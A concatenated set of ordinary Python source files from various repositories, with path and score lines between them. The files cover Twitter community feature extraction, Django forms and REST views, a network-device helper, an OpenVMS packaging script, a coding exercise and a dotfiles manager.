_assign_code = _assign_code[:-1]+']' # remove the last comma
else:
_assign_code = _key + '=' + '\'' + input_dict[_key] + '\''
exec(_assign_code)
for _key in output_dict:
_assign_code = _key + '=' + '\'' + output_dict[_key] + '\''
exec(_assign_code)
exec(preprocess_string)
# 1st round: substitute variable names in code string
_1st_processed_code = ''
for _chunk in _code_series:
if 'text' in _chunk:
_1st_processed_code += _chunk['text']
if 'var' in _chunk:
_1st_processed_code += eval(_chunk['var'])
#2nd round: replace variable names left, which might come from preprocess,
# like: input_[0]
_parsed_2nd_code = parse_code(_1st_processed_code)
code = ''
for _chunk in _parsed_2nd_code:
if 'text' in _chunk:
code += _chunk['text']
if 'var' in _chunk:
code += eval(_chunk['var'])
# Preset output code, in case postprocess part is empty
exec(output_code_descriptor + ' = code')
# BUG: if output_code_descriptor is 'code', there is a Python bug that
# variable code is not updated after the next exec
exec(postprocess_string)
final_processed_code = eval(output_code_descriptor)
return final_processed_code
| 3.953125 | 4 |
build_feature_vectors_32.py | weberdc/find_hccs | 7 | 17681 | #!/usr/bin/env python3
import csv
import gzip
import json
import networkx as nx
import sys
import time
import utils
from argparse import ArgumentParser
from calculate_activity_network import embedded_extended_tweet_url, root_of_conversation
from collections import defaultdict
from datetime import datetime
from utils import eprint, expanded_urls_from, extract_text, flatten, lowered_hashtags_from, mentioned_ids_from#, timestamp_2_epoch_seconds
# Builds feature vectors for HCC members and their groupings as input to the
# classifiers for validation
#
# This version extracts 32 features
#
# Renamed from extract_feature_vectors_for_hcc_classifier.py
class Options():
def __init__(self):
self._init_parser()
def _init_parser(self):
usage = 'extract_feature_vectors_for_hcc_classifier.py -t <tweets.json> -i <ids.csv> -l <label>'
self.parser = ArgumentParser(usage=usage,conflict_handler='resolve')
self.parser.add_argument(
'-t', '--tweets',
required=True,
dest='tweets_file',
help='File containing all the tweets'
)
self.parser.add_argument(
'-i', '--ids-file',
required=True,
dest='ids_file',
help='The list of IDs to build feature vectors for.'
)
self.parser.add_argument(
'-l', '--label',
required=True,
dest='label',
help='The label to apply to each entry in the data generated (first column).'
)
self.parser.add_argument(
'-v', '--verbose',
action='store_true',
default=False,
dest='verbose',
help='Turn on verbose logging (default: False)'
)
def parse(self, args=None):
return self.parser.parse_args(args)
TWITTER_TS_FORMAT = '%a %b %d %H:%M:%S +0000 %Y' # Tue Apr 26 08:57:55 +0000 2011
def parse_ts(ts_str):
time_struct = time.strptime(ts_str, TWITTER_TS_FORMAT)
return datetime.fromtimestamp(time.mktime(time_struct))
def count(fltr): return len(list(fltr))
def root_of_conversation(tweet_in_conversation, tweet_map):
"""Finds the root of the conversation that the provided tweet is in"""
root_id = tweet_in_conversation
# go until we reply outside of the corpus, or the current tweet isn't a reply
while root_id in tweet_map and 'in_reply_to_status_id_str' in tweet_map[root_id] and tweet_map[root_id]['in_reply_to_status_id_str']:
root_id = tweet_map[root_id]['in_reply_to_status_id_str']
return root_id
def embedded_extended_tweet_url(tweet_id, url):
# extended tweets, because their text field is not long enough for the
# content, they include an embedded url pointing to the full tweet
# Of course, this isn't the sort of URL we're interested in, so we can
# test for it so we can strip it out. This method identifies it.
return url == 'https://twitter.com/i/web/status/%s' % tweet_id
USER_FEATURES = [
'U_tweet_count',
'U_retweet_count',
'U_reply_count',
'U_tweet_rate',
'U_mentioned_ids', # unique IDs
'U_mention_count', # every mention
'U_unique_hts', # unique hashtags
'U_ht_count', # every hashtag
'U_unique_urls', # unique hashtags
'U_url_count', # every hashtag
'U_default_img',
'U_desc_len',
'U_url'
]
DEFAULT_PROF_IMG_URL = 'http://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png'
def build_user_feature_vector(u_id, activity, collection_period_mins):
profile = activity[0]['user']
return {
'U_tweet_count' : len(activity),
'U_retweet_count' : count(filter(lambda t: 'retweeted_status' in t and t['retweeted_status'], activity)),
'U_reply_count' : count(filter(lambda t: t['in_reply_to_status_id_str'], activity)),
'U_tweet_rate' : len(activity) / collection_period_mins,
'U_mentioned_ids' : len(set(flatten(map(mentioned_ids_from, activity)))), # unique IDs
'U_mention_count' : len(list(flatten(map(mentioned_ids_from, activity)))), # every mention
'U_unique_hts' : len(set(flatten(map(lowered_hashtags_from, activity)))), # unique hashtags
'U_ht_count' : len(list(flatten(map(lowered_hashtags_from, activity)))), # every hashtag
'U_unique_urls' : len(set(flatten(map(expanded_urls_from, activity)))), # unique hashtags
'U_url_count' : len(list(flatten(map(expanded_urls_from, activity)))), # every hashtag
'U_default_img' : 1 if profile['profile_image_url'] == DEFAULT_PROF_IMG_URL else 0,
'U_desc_len' : len(profile['description'] if profile['description'] else ''),
'U_url' : len(profile['url'] if profile['url'] else ''),
}
COMMUNITY_FEATURES = [
'C_tweet_count',
'C_node_count',
'C_edge_count',
'C_user_count',
'C_author_count',
'C_hashtag_count',
'C_url_count',
'C_repost_count',
'C_quote_count',
'C_mention_count',
'C_reply_count',
'C_use_ht_count',
'C_use_url_count',
'C_in_conv_count',
'C_in/ext_repost',
'C_in/ext_mention',
'C_in/ext_reply',
]
def build_community_feature_vector(community, g):
def count_nodes_if(cond):
return len([n for n, d in g.nodes(data=True) if cond(n, d)])
def count_edges_if(cond):
return len([k for u, v, k, d in g.edges(data=True,keys=True) if cond(u, v, k, d)]) # d['interaction'] == t]
# return len(['x' for u, v, d in g.edges(data=True) if cond(u, v, d)])
int_users = [n for n, d in g.nodes(data=True) if d['is_author']]
ext_users = [n for n, d in g.nodes(data=True) if d['n_type'] == 'USER' and not d['is_author']]
repost_count = count_edges_if(lambda u, v, k, d: d['interaction'] == 'REPOST')
reply_count = count_edges_if(lambda u, v, k, d: d['interaction'] == 'REPLY')
mention_count = count_edges_if(lambda u, v, k, d: d['interaction'] == 'MENTION')
return {
'C_tweet_count' : g.graph['post_count'],
'C_node_count' : len(g),
'C_edge_count' : len(g.edges()),
'C_user_count' : count_nodes_if(lambda n, d: d['n_type'] == 'USER'),
'C_author_count' : count_nodes_if(lambda n, d: d['n_type'] == 'USER' and d['is_author']),
'C_hashtag_count' : count_nodes_if(lambda n, d: d['n_type'] == 'HASHTAG'),
'C_url_count' : count_nodes_if(lambda n, d: d['n_type'] == 'URL'),
'C_repost_count' : repost_count,
'C_quote_count' : count_edges_if(lambda u, v, k, d: d['interaction'] == 'QUOTE'),
'C_mention_count' : mention_count,
'C_reply_count' : reply_count,
'C_use_ht_count' : count_edges_if(lambda u, v, k, d: d['interaction'] == 'HASHTAG'),
'C_use_url_count' : count_edges_if(lambda u, v, k, d: d['interaction'] == 'URL'),
'C_in_conv_count' : count_edges_if(lambda u, v, k, d: d['interaction'] == 'IN_CONVERSATION'),
'C_in/ext_repost' : count_edges_if(lambda u, v, k, d: d['interaction'] == 'REPOST' and v in int_users) / repost_count if repost_count else 0,
'C_in/ext_mention' : count_edges_if(lambda u, v, k, d: d['interaction'] == 'MENTION' and v in int_users) / mention_count if mention_count else 0,
'C_in/ext_reply' : count_edges_if(lambda u, v, k, d: d['interaction'] == 'REPLY' and v in int_users) / reply_count if reply_count else 0
}
def mk_feature_str(keys, feature_map):
return ','.join([str(feature_map[k]) for k in keys])
def build_activity_graph(tweets, t_0): # tweets is a tweet map { tweet_id : tweet }
first_tweet_ts_str = utils.ts_to_str(t_0, fmt=utils.TWITTER_TS_FORMAT) # epoch_seconds_2_timestamp_str(t_0)
first_tweet_ts = utils.epoch_seconds_2_ts(t_0) #first_tweet_ts_str) # parse_twitter_ts(first_tweet_ts_str)
g = nx.MultiDiGraph(post_count=len(tweets))
def add_node(g, n_id, n_type='USER', is_author=False):
if n_id not in g:
g.add_node(n_id, n_type=n_type, label=n_id, is_author=is_author)
elif is_author:
# g.nodes[n_id]['n_type'] = n_type
g.nodes[n_id]['is_author'] = is_author
def node_type_for(interaction):
if interaction == 'HASHTAG' or interaction == 'URL':
return interaction
else:
return 'USER'
def add_edge(g, from_id, to_id, tweet_id, ts_str, int_type, **kwargs):
add_node(g, from_id, 'USER', True)
# g.nodes[from_id]['is_author'] = True
add_node(g, to_id, n_type=node_type_for(int_type))
t = utils.extract_ts_s(ts_str) - t_0 # timestamp_2_epoch_seconds(utils.extract_ts_s(ts_str)) - t_0
attrs = {
'time_t' : t,
'tweet_id' : tweet_id,
'interaction' : int_type
}
key = '%s %s %s in %s' % (from_id, int_type, to_id, tweet_id)
g.add_edge(from_id, to_id, key=key, **{**attrs, **kwargs})
# Build networks
# edge types: REPOST, MENTION, REPLY, QUOTE, URL, HASHTAG
observed_user_ids = set()
for tweet_id in tweets:
tweet = tweets[tweet_id]
hashtags = lowered_hashtags_from(tweet)
urls = expanded_urls_from(tweet)
mentions = mentioned_ids_from(tweet)
tweet_text = extract_text(tweet)
tweet_ts = tweet['created_at']
tweet_id = tweet['id_str']
tweeter_id = tweet['user']['id_str']
observed_user_ids.add(tweeter_id)
for ht in hashtags:
add_edge(g, tweeter_id, ht, tweet_id, tweet_ts, 'HASHTAG')
for url in urls:
if not embedded_extended_tweet_url(tweet_id, url): # extended tweets include a URL to their extended form
add_edge(g, tweeter_id, url, tweet_id, tweet_ts, 'URL')
for mentioned_id in mentions:
observed_user_ids.add(mentioned_id)
add_edge(g, tweeter_id, mentioned_id, tweet_id, tweet_ts, 'MENTION')
if 'retweeted_status' in tweet:
retweeter = tweeter_id
retweetee = tweet['retweeted_status']['user']['id_str']
observed_user_ids.add(retweetee)
add_edge(
g, retweeter, retweetee, tweet_id, tweet_ts, 'REPOST',
original_tweet_id=tweet['retweeted_status']['id_str'],
original_tweet_ts=tweet['retweeted_status']['created_at'],
posting_delay_sec=(
utils.extract_ts_s(tweet['retweeted_status']['created_at']) -
utils.extract_ts_s(tweet_ts)
)#.total_seconds()
)
elif 'quoted_status' in tweet and 'retweeted_status' not in tweet:
quoter = tweeter_id
quotee = tweet['quoted_status']['user']['id_str']
observed_user_ids.add(quotee)
add_edge(
g, quoter, quotee, tweet_id, tweet_ts, 'QUOTE',
original_tweet_id=tweet['quoted_status']['id_str'],
original_tweet_ts=tweet['quoted_status']['created_at'],
posting_delay_sec=(
utils.extract_ts_s(tweet['quoted_status']['created_at']) -
utils.extract_ts_s(tweet_ts)
)#.total_seconds()
)
elif 'in_reply_to_status_id_str' in tweet and tweet['in_reply_to_status_id_str'] in tweets:
# only consider replies that appear in the corpus
# basic reply info
replier = tweeter_id
replied_to = tweet['in_reply_to_user_id_str']
observed_user_ids.add(replied_to)
replied_to_status = tweets[tweet['in_reply_to_status_id_str']]
replied_to_status_ts = replied_to_status['created_at']
posting_delay_sec = (utils.extract_ts_s(replied_to_status_ts) - utils.extract_ts_s(tweet_ts))#.total_seconds()
add_edge(
g, replier, replied_to, tweet_id, tweet_ts, 'REPLY',
original_tweet_id=tweet['in_reply_to_status_id_str'],
original_tweet_ts=replied_to_status_ts,
posting_delay_sec=posting_delay_sec
)
# in conversation
if tweet['in_reply_to_status_id_str'] in tweets:
# follow the reply chain as far as we can
conversation_root = root_of_conversation(tweet['in_reply_to_status_id_str'], tweets)
# conversation_root MAY NOT be in the corpus - it's still a link though
conv_root_ts = first_tweet_ts_str
posting_delay_sec = (utils.ts_2_epoch_seconds(first_tweet_ts) - utils.extract_ts_s(tweet_ts))#.total_seconds()
if conversation_root in tweets:
observed_user_ids.add(tweets[conversation_root]['user']['id_str'])
conv_root_ts = tweets[conversation_root]['created_at']
posting_delay_sec = (utils.extract_ts_s(conv_root_ts) - utils.extract_ts_s(tweet_ts))#.total_seconds()
add_edge(
g, replier, conversation_root, tweet_id, tweet_ts, 'IN_CONVERSATION',
original_tweet_id=conversation_root,
original_tweet_ts=conv_root_ts,
posting_delay_sec=posting_delay_sec
)
return g
DEBUG=False
def log(msg):
if DEBUG: eprint(msg)
if __name__ == '__main__':
options = Options()
opts = options.parse(sys.argv[1:])
DEBUG=opts.verbose
users = {}
communities = defaultdict(lambda: [], {})
with open(opts.ids_file, 'r', encoding='utf-8') as f:
csv_reader = csv.DictReader(f, delimiter=',', quotechar='"')
for row in csv_reader:
r = {}
for key in row: # range(len(row)):
r[key] = row[key]
users[r['node_id']] = r
communities[r['community_id']].append(r['node_id'])
# users[r[0]] = r
tweets = dict([(uid, []) for uid in users.keys()])
earliest_ts = sys.maxsize
latest_ts = 0
# with open(opts.tweets_file, 'r', encoding='utf-8') as f:
f = gzip.open(opts.tweets_file, 'rt') if opts.tweets_file[-1] in 'zZ' else open(opts.tweets_file, 'r', encoding='utf-8')
for l in f:
tweet = json.loads(l.strip())
tweet['ts'] = utils.extract_ts_s(tweet['created_at']) # timestamp_2_epoch_seconds(parse_ts(tweet['created_at']))
if tweet['ts'] < earliest_ts: earliest_ts = tweet['ts']
if tweet['ts'] > latest_ts: latest_ts = tweet['ts']
user_id = tweet['user']['id_str']
if user_id in users.keys():
# tweet['ts'] = timestamp_2_epoch_seconds(parse_ts(tweet['created_at']))
tweets[user_id].append(tweet)
f.close()
collection_period_mins = (latest_ts - earliest_ts) / 60
user_feature_vectors = {}
for user_id in tweets:
tweets[user_id].sort(key=lambda t: t['ts'])
user_feature_vectors[user_id] = build_user_feature_vector(user_id, tweets[user_id], collection_period_mins)
community_feature_vectors = {}
for community_id in communities:
community_tweets = {}
community = communities[community_id]
for user_id in community:
for t in tweets[user_id]:
community_tweets[t['id_str']] = t
# community_tweets += tweets[user_id]
# community_tweets.sort(key=lambda t: t['ts'])
# build activity graph from tweets
g = build_activity_graph(community_tweets, earliest_ts)
# build feature vector from activity graph
community_feature_vectors[community_id] = build_community_feature_vector(community, g)
header = ','.join(map(str, ['Label'] + USER_FEATURES + ['U_prop_hcc_degree', 'community_id'] + COMMUNITY_FEATURES))
print(header)
for user_id in tweets:
user_vector = user_feature_vectors[user_id]
hcc_prop_degree = users[user_id]['proportional_degree']
community_id = users[user_id]['community_id']
community_vector = community_feature_vectors[community_id]
print(','.join([
opts.label,
mk_feature_str(USER_FEATURES, user_vector),
hcc_prop_degree,
community_id,
mk_feature_str(COMMUNITY_FEATURES, community_vector)
]))
# print('%s: %s %s' % (user_id, str(user_feature_vectors[user_id]), str()))
| 2.453125 | 2 |
WEEKS/CD_Sata-Structures/_RESOURCES/CODESIGNAL/first_duplicate.py | webdevhub42/Lambda | 0 | 17682 | def firstDuplicate(a):
number_frequencies, number_indices, duplicate_index = {}, {}, {}
# Iterate through list and increment frequency count
# if number not in dict. Also, note the index asscoiated
# with the value
for i in range(len(a)):
if a[i] not in number_frequencies:
number_frequencies[a[i]] = 1
number_indices[a[i]] = i
elif a[i] in number_frequencies:
if number_frequencies[a[i]] < 2:
number_frequencies[a[i]] += 1
number_indices[a[i]] = i
for number in number_frequencies:
if number_frequencies[number] == 2:
duplicate_index[number] = number_indices[number]
if not duplicate_index:
return -1
else:
minimal_index_key = min(duplicate_index, key=duplicate_index.get)
return minimal_index_key
| 3.46875 | 3 |
src/viewer/abs/forms.py | ozacas/asxtrade | 8 | 17683 | <gh_stars>1-10
from django import forms
from django.core.exceptions import ValidationError
from abs.models import dataflows
class ABSDataflowForm(forms.Form):
dataflow = forms.ChoiceField(choices=(), required=True)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields["dataflow"].choices = [(i.abs_id, i.name) for i in dataflows()]
| 2.375 | 2 |
pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py | patrickboertje/genielibs | 1 | 17684 | <reponame>patrickboertje/genielibs<filename>pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py
# Python
import logging
# Unicon
from unicon.core.errors import SubCommandFailure
# Logger
log = logging.getLogger(__name__)
def clear_access_session_intf(device, intf):
""" clear access-session interface {}
Args:
device (`obj`): Device object
intf('str'): Name of the interface to clear access-session
Returns:
None
Raises:
SubCommandFailure
"""
try:
device.execute('clear access-session interface {intf}'.format(intf=intf))
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not clear access-session interface on {device}. Error:\n{error}"
.format(device=device, error=e)
)
| 2.078125 | 2 |
pipeline/forms.py | jnis77diver/django-pipeline | 0 | 17685 | <filename>pipeline/forms.py
"""Support for referencing Pipeline packages in forms and widgets."""
from __future__ import unicode_literals
from django.contrib.staticfiles.storage import staticfiles_storage
from django.utils.functional import cached_property
try:
from django.utils.six import iteritems, add_metaclass
except ImportError:
from .decorator import add_metaclass
def iteritems(dictionary):
return dictionary.items()
from .collector import default_collector
from .conf import settings
from .packager import Packager
class PipelineFormMediaProperty(object):
"""A property that converts Pipeline packages to lists of files.
This is used behind the scenes for any Media classes that subclass
:py:class:`PipelineFormMedia`. When accessed, it converts any Pipeline
packages into lists of media files and returns or forwards on lookups to
that list.
"""
def __init__(self, get_media_files_func, media_cls, extra_files):
"""Initialize the property.
Args:
get_media_files_func (callable):
The function to call to generate the media files.
media_cls (type):
The Media class owning the property.
extra_files (object):
Files listed in the original ``css`` or ``js`` attribute on
the Media class.
"""
self._get_media_files_func = get_media_files_func
self._media_cls = media_cls
self._extra_files = extra_files
@cached_property
def _media_files(self):
"""The media files represented by the property."""
return self._get_media_files_func(self._media_cls, self._extra_files)
def __get__(self, *args, **kwargs):
"""Return the media files when accessed as an attribute.
This is called when accessing the attribute directly through the
Media class (for example, ``Media.css``). It returns the media files
directly.
Args:
*args (tuple, unused):
Unused positional arguments.
**kwargs (dict, unused):
Unused keyword arguments.
Returns:
object:
The list or dictionary containing the media files definition.
"""
return self._media_files
def __getattr__(self, attr_name):
"""Return an attribute on the media files definition.
This is called when accessing an attribute that doesn't otherwise
exist in the property's dictionary. The call is forwarded onto the
media files definition.
Args:
attr_name (unicode):
The attribute name.
Returns:
object:
The attribute value.
Raises:
AttributeError:
An attribute with this name could not be found.
"""
return getattr(self._media_files, attr_name)
def __iter__(self):
"""Iterate through the media files definition.
This is called when attempting to iterate over this property. It
iterates over the media files definition instead.
Yields:
object:
Each entry in the media files definition.
"""
return iter(self._media_files)
class PipelineFormMediaMetaClass(type):
"""Metaclass for the PipelineFormMedia class.
This is responsible for converting CSS/JavaScript packages defined in
Pipeline into lists of files to include on a page. It handles access to the
:py:attr:`css` and :py:attr:`js` attributes on the class, generating a
list of files to return based on the Pipelined packages and individual
files listed in the :py:attr:`css`/:py:attr:`css_packages` or
:py:attr:`js`/:py:attr:`js_packages` attributes.
"""
def __new__(cls, name, bases, attrs):
"""Construct the class.
Args:
name (bytes):
The name of the class.
bases (tuple):
The base classes for the class.
attrs (dict):
The attributes going into the class.
Returns:
type:
The new class.
"""
new_class = super(PipelineFormMediaMetaClass, cls).__new__(
cls, name, bases, attrs)
# If we define any packages, we'll need to use our special
# PipelineFormMediaProperty class. We use this instead of intercepting
# in __getattribute__ because Django does not access them through
# normal property access. Instead, grabs the Media class's __dict__
# and accesses them from there. By using these special properties, we
# can handle direct access (Media.css) and dictionary-based access
# (Media.__dict__['css']).
if 'css_packages' in attrs:
new_class.css = PipelineFormMediaProperty(
cls._get_css_files, new_class, attrs.get('css') or {})
if 'js_packages' in attrs:
new_class.js = PipelineFormMediaProperty(
cls._get_js_files, new_class, attrs.get('js') or [])
return new_class
def _get_css_files(cls, extra_files):
"""Return all CSS files from the Media class.
Args:
extra_files (dict):
The contents of the Media class's original :py:attr:`css`
attribute, if one was provided.
Returns:
dict:
The CSS media types and files to return for the :py:attr:`css`
attribute.
"""
packager = Packager()
css_packages = getattr(cls, 'css_packages', {})
return dict(
(media_target,
cls._get_media_files(packager=packager,
media_packages=media_packages,
media_type='css',
extra_files=extra_files.get(media_target,
[])))
for media_target, media_packages in iteritems(css_packages)
)
def _get_js_files(cls, extra_files):
"""Return all JavaScript files from the Media class.
Args:
extra_files (list):
The contents of the Media class's original :py:attr:`js`
attribute, if one was provided.
Returns:
list:
The JavaScript files to return for the :py:attr:`js` attribute.
"""
return cls._get_media_files(
packager=Packager(),
media_packages=getattr(cls, 'js_packages', {}),
media_type='js',
extra_files=extra_files)
def _get_media_files(cls, packager, media_packages, media_type,
extra_files):
"""Return source or output media files for a list of packages.
This will go through the media files belonging to the provided list
of packages referenced in a Media class and return the output files
(if Pipeline is enabled) or the source files (if not enabled).
Args:
packager (pipeline.packager.Packager):
The packager responsible for media compilation for this type
of package.
media_packages (list of unicode):
The list of media packages referenced in Media to compile or
return.
extra_files (list of unicode):
The list of extra files to include in the result. This would
be the list stored in the Media class's original :py:attr:`css`
or :py:attr:`js` attributes.
Returns:
list:
The list of media files for the given packages.
"""
source_files = list(extra_files)
if (not settings.PIPELINE_ENABLED and
settings.PIPELINE_COLLECTOR_ENABLED):
default_collector.collect()
for media_package in media_packages:
package = packager.package_for(media_type, media_package)
if settings.PIPELINE_ENABLED:
source_files.append(
staticfiles_storage.url(package.output_filename))
else:
source_files += packager.compile(package.paths)
return source_files
@add_metaclass(PipelineFormMediaMetaClass)
class PipelineFormMedia(object):
"""Base class for form or widget Media classes that use Pipeline packages.
Forms or widgets that need custom CSS or JavaScript media on a page can
define a standard :py:class:`Media` class that subclasses this class,
listing the CSS or JavaScript packages in :py:attr:`css_packages` and
:py:attr:`js_packages` attributes. These are formatted the same as the
standard :py:attr:`css` and :py:attr:`js` attributes, but reference
Pipeline package names instead of individual source files.
If Pipeline is enabled, these will expand to the output files for the
packages. Otherwise, these will expand to the list of source files for the
packages.
Subclasses can also continue to define :py:attr:`css` and :py:attr:`js`
attributes, which will be returned along with the other output/source
files.
Example:
from django import forms
from pipeline.forms import PipelineFormMedia
class MyForm(forms.Media):
...
class Media(PipelineFormMedia):
css_packages = {
'all': ('my-form-styles-package',
'other-form-styles-package'),
'print': ('my-form-print-styles-package',),
}
js_packages = ('my-form-scripts-package',)
js = ('some-file.js',)
"""
| 2.328125 | 2 |
api_user/views.py | archkwon/python-django-restful-mysql | 0 | 17686 | from django.http import QueryDict
from django.http.response import JsonResponse
from rest_framework import viewsets, status
from rest_framework.views import APIView
from .serializers import *
class UserInfoViewSet(viewsets.ModelViewSet):
queryset = UserInfoModel.objects.all()
serializer_class = UserInfoSerializer
def get_queryset(self):
queryset = super().get_queryset()
user_id = self.request.query_params.get('user_id', '')
if user_id:
queryset.get(user_id=user_id)
return queryset
class UserInfoSessionView(APIView):
# noinspection PyMethodMayBeStatic
def get(self, request, *args, **kwargs):
user_id = request.GET['user_id']
user_model = UserInfoModel.objects.get(user_id=user_id)
serializer = UserInfoSerializer(user_model)
return JsonResponse({
'code': True,
'status': status.HTTP_200_OK,
'response': serializer.data,
'message': 'SEARCH_SUCCESS'}, status=status.HTTP_200_OK)
# 로그인 토큰 업데이트
class UpdateTokenAction(APIView):
# noinspection PyMethodMayBeStatic
def put(self, request):
put = QueryDict(request.body)
user_id = put.get('user_id')
device_token = put.get('device_token')
if UserInfoModel.objects.filter(user_id=user_id).exists():
user_detail = UserInfoModel.objects.get(user_id=user_id)
user_detail.device_token = device_token
user_detail.save()
return JsonResponse({
'code': True,
'status': status.HTTP_200_OK,
'message': 'UPDATE_SUCCESS'}, status=status.HTTP_200_OK)
return JsonResponse({
'code': False,
'status': status.HTTP_200_OK,
'message': 'FAIL'}, status=status.HTTP_200_OK) | 2.171875 | 2 |
vms/create_kit_files.py | vmssoftware/python_3_8_2 | 3 | 17687 | import os
import re
import sys
def spec_replacer(match):
if match.group(0) == ' ':
return '^_'
return '^' + match.group(0)
def create_content(type, major, minor, level, edit):
python_dir = '/python$root'
python_dir_len = len(python_dir)
all_dirs = []
all_files = []
spec_pattern = re.compile('([. ^+()])')
for root, dirs, files in os.walk(python_dir):
inner_dirs = list(filter(lambda x: x != '', spec_pattern.sub(spec_replacer, root[python_dir_len:]).split('/')))
kit_dir = '[' + '.'.join(['python'] + inner_dirs) + ']'
all_dirs.append('directory "' + kit_dir + '" version limit 1;')
for file in files:
file_name, file_ext = os.path.splitext(file)
if file_ext == '':
file_ext = '.'
file_name = spec_pattern.sub(spec_replacer, file_name)
all_files.append('file "' + \
kit_dir + file_name + file_ext + \
'" source "' + \
kit_dir + file_name + file_ext + \
'";')
# try:
# dirs.remove('__pycache__')
# except:
# pass
kit_template = '''--
-- (C) Copyright 2021 VMS Software Inc.
--
product VSI I64VMS PYTHON {type}{major}.{minor}-{level}{edit} FULL ;
--
-- Execute the preconfigure procedure
--
execute preconfigure "@pcsi$source:[python]python$pcsi_preconfigure.com" uses [python]python$pcsi_preconfigure.com ;
--
-- Make sure VMS V8.4 or above is installed
--
if ((not <software VSI I64VMS VMS version minimum V8.4>) and (not <software HP I64VMS VMS version minimum V8.4>)) ;
error NO_MIN_VMS abort ;
end if ;
--
-- ODS-5 Disk(s) should be available on this system
--
if (<logical name PYTHON$ODS5_AVAIL equals 0 table LNM$JOB>) ;
error NO_ODS5_DISKS ;
end if ;
--
-- Directories...
--
{dirs}
--
-- Files...
--
{files}
--
-- Start-up and shutdown scripts
--
file "[sys$startup]python$define_root.com" source "[python]python$define_root.com";
file "[sys$startup]python$startup.com" source "[python]python$startup.com";
file "[sys$startup]python$shutdown.com" source "[python]python$shutdown.com";
--
-- Release notes
--
-- (none)
--
-- Do post-install tasks
--
execute postinstall "@pcsi$source:[python]python$define_root.com" interactive uses "[python]python$define_root.com" ;
--
-- Okay, done. Tell the user what to do next.
--
information POST_INSTALL phase after with helptext;
--
-- All done
--
end product;
'''
# type, major, minor, level, edit must be the same as in pythlib.pcsi$text
kit_content = kit_template.format(
type=type,
major=major,
minor=minor,
level=level,
edit=edit,
dirs='\n '.join(all_dirs),
files='\n '.join(all_files))
with open('python.pcsi$desc', 'w') as file:
file.write(kit_content)
text_template = '''=product VSI I64VMS PYTHON {type}{major}.{minor}-{level}{edit} full
1 'PRODUCT
=prompt Python for OpenVMS is based on Python Version 3.8.2
1 'PRODUCER
=prompt VSI Software Inc.
1 'NOTICE
=prompt (C) Copyright 2021 VMS Software Inc.
1 NO_MIN_VMS
=prompt Minimum OpenVMS software version not found on this system, abort instalation
This kit requires a minimum of OpenVMS I64 V8.4.
1 NO_ODS5_DISKS
=prompt ODS-5 disk(s) not found on this system, abort installation
This kit requires an ODS-5 disk to be correctly installed in this system.
1 POST_INSTALL
=prompt Post-installation tasks are required.
To define the Python runtime at system boot time, add the
following lines to SYS$MANAGER:SYSTARTUP_VMS.COM:
$ file := SYS$STARTUP:PYTHON$STARTUP.COM
$ if f$search("''file'") .nes. "" then @'file'
To shutdown the Python runtime at system shutdown time, add the
following lines to SYS$MANAGER:SYSHUTDWN.COM:
$ file := SYS$STARTUP:PYTHON$SHUTDOWN.COM
$ if f$search("''file'") .nes. "" then @'file'
'''
text_content = text_template.format(
type=type,
major=major,
minor=minor,
level=level,
edit=edit,
dirs='\n '.join(all_dirs),
files='\n '.join(all_files))
with open('python.pcsi$text', 'w') as file:
file.write(text_content)
if __name__ == "__main__":
import getopt
import datetime
opts, args = getopt.getopt(sys.argv[1:], '', ['type=', 'major=', 'minor=', 'level=', 'edit='])
type = 'F'
major = '3'
minor = '8'
level = '2'
edit = '' # 'd' + datetime.date.today().strftime('%Y%m%d')
for opt, optarg in opts:
if opt in ['--type']:
type = optarg
elif opt in ['--major']:
major = optarg
elif opt in ['--minor']:
minor = optarg
elif opt in ['--level']:
level = optarg
elif opt in ['--edit']:
edit = optarg
else:
print('Unknown option %s' % opt)
create_content(
type,
major,
minor,
level,
edit,
)
| 2.375 | 2 |
dotfiles/config/feltnerm/bin/dots.py | feltnerm/dotfiles | 4 | 17688 | <reponame>feltnerm/dotfiles
#!/usr/bin/env python
# .py
# @TODO:
# - fix the diffing
# - use rsync across hosts or something fancy
import argparse, difflib, functools, re, shutil, subprocess, sys, time, os
from pprint import pprint
__description__ = "Manage your dotfiles."
ls = lambda path: os.listdir(path)
ls_abs = lambda path: [os.path.join(path, x) for x in os.listdir(path)]
ln = lambda src, dst: os.symlink(src, dst)
unlink = lambda src: os.unlink(src)
def rm(path):
try:
if os.path.isdir(path):
os.rmdir(path)
else:
os.remove(path)
except OSError, e:
print(e)
def diff(fromfile, tofile):
if os.path.exists(tofile):
fromdate = time.ctime(os.stat(fromfile).st_mtime)
todate = time.ctime(os.stat(tofile).st_mtime)
fromlines = open(fromfile, 'U').readlines()
tolines = open(tofile, 'U').readlines()
diff = difflib.unified_diff(fromlines, tolines,
fromfile, tofile, fromdate, todate)
return diff
def parse_args(argv):
DEFAULTS = {
'source_dir': os.path.join(os.getenv("HOME"), "dotfiles"),
'dest_dir': os.path.join(os.getenv("HOME"))
}
ap = argparse.ArgumentParser(prog='dots.py',
description=__description__)
ap.add_argument("-d", "--dest-dir", default=DEFAULTS['dest_dir'],
help="Directory to process source files to.")
ap.add_argument("-e", "--exclude", help="Regex of files to exclude")
ap.add_argument("-f", "--force", help="Force the operation to continue.")
ap.add_argument("-i", "--interactive", default=False, action='store_true',
help="Run interactively.")
ap.add_argument("-l", "--list-commands", default=False, action='store_true',
help="List the possible commands.")
ap.add_argument("-n", "--dry-run", default=False, action='store_true',
help="Dry run.")
ap.add_argument("--no-dot",
help="Comma-separated list of files to not append a '.' to")
ap.add_argument("-s", "--source-dir", default=DEFAULTS['source_dir'],
help="Directory to process source files from.")
ap.add_argument("-v", "--version", default=False, action='store_true',
help="Print the version.")
ap.add_argument("-V", "--verbose", default=False, action='store_true',
help="Verbose mode.")
ap.add_argument("commands", nargs="*", help="Command to run.")
args = ap.parse_args(argv)
return args
def ask(msg):
inp = raw_input(msg + " [Y]/n?").lower()
while inp not in ('y','n'):
inp = raw_input(msg + " [Y]/n?").lower()
if inp == 'y':
return True
else:
return False
#
# dotfiles command API
#
class Dotfiles(object):
def __init__(self, opts):
self.options = {
"exclude": [
r'^\.'
],
"exclude_list": [
'README.md',
'LICENSE',
'dots.py',
],
"nodot_list": ['bin']
}
for key in opts.keys():
if opts.get(key, None):
self.options[key] = (opts.get(key))
# Look for the source and destination directories
self.src = self.options.get('source_dir', None)
